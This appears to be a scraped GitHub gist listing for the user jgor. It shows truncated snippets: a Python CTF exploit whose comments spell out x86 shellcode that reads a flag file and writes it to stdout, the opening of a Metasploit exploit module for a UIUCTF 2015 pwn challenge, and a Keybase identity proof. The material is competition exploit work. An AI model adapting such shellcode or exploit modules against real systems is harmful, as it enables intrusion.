Skip to content

Instantly share code, notes, and snippets.

#!/usr/bin/env python
import socket
# b8 03 00 00 00 mov $0x3,%eax # syscall 3 (read)
# bb 03 00 00 00 mov $0x3,%ebx # from fd 3 (flag file)
# 89 e1 mov %esp,%ecx # to stack
# ba 30 00 00 00 mov $0x30,%edx # 0x30 bytes
# cd 80 int $0x80 # perform syscall
# b8 02 00 00 00 mov $0x2,%eax # syscall 2 (write)
# bb 01 00 00 00 mov $0x1,%ebx # to fd 1 (stdout)
@jgor
jgor / unoriginal.rb
Last active March 22, 2018 03:53
UIUCTF 2015 - pwn - unoriginal
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote

Keybase proof

I hereby claim:

  • I am jgor on github.
  • I am jgor (https://keybase.io/jgor) on keybase.
  • I have a public key whose fingerprint is F73B 22DD 326D 4363 E57D BA01 2E90 3DBB 4991 5322

To claim this, I am signing this object: